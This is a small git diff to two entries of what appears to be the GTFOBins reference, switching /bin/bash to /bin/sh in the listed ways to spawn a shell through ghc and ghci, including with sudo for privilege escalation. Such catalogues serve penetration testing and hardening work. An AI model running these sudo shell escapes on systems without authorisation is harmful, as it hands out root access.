diff --git a/_gtfobins/ghc.md b/_gtfobins/ghc.md index 4ebb590..c2a4807 100644 --- a/_gtfobins/ghc.md +++ b/_gtfobins/ghc.md @@ -1,7 +1,7 @@ --- functions: shell: - - code: ghc -e 'System.Process.callCommand "/bin/bash"' + - code: ghc -e 'System.Process.callCommand "/bin/sh"' sudo: - - code: sudo ghc -e 'System.Process.callCommand "/bin/bash"' + - code: sudo ghc -e 'System.Process.callCommand "/bin/sh"' --- diff --git a/_gtfobins/ghci.md b/_gtfobins/ghci.md index 330ce0e..cc1f34a 100644 --- a/_gtfobins/ghci.md +++ b/_gtfobins/ghci.md @@ -3,9 +3,9 @@ functions: shell: - code: | ghci - Prelude> System.Process.callCommand "/bin/bash" + System.Process.callCommand "/bin/sh" sudo: - code: | sudo ghci - Prelude> System.Process.callCommand "/bin/bash" + System.Process.callCommand "/bin/sh" ---